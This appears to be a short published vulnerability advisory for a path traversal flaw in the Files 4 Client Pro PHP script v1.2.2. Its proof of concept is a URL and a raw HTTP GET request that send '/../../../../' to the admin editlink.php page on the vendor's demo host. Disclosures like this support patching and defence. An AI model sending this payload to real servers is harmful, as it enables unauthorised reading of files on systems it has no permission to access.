[+] Exploit Title: Files 4 Client Pro - Easy File Transfer v1.2.2 - Path Traversal
[+] Google Dork: 
[+] Date: 2020-07-30
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Kevin Schiffer [ https://kevinschiffer.com ]
[+] Software Version: 1.2.2
[+] Software Link: https://codecanyon.net/item/files-4-client-pro-easy-file-transfer/8916122
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-22



### [ Info: ]

[i] A Path Traversal (aka Directory Traversal) vulnerability was discovered in the Files 4 Client Pro PHP script through 1.2.2.



### [ PoC: ]

[!] http://projects.kevinschiffer.de/files4client-pro/admin/editlink.php?link=/../../../../

[!] GET /files4client-pro/admin/editlink.php?link=/../../../../ HTTP/1.1
Host: projects.kevinschiffer.de



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector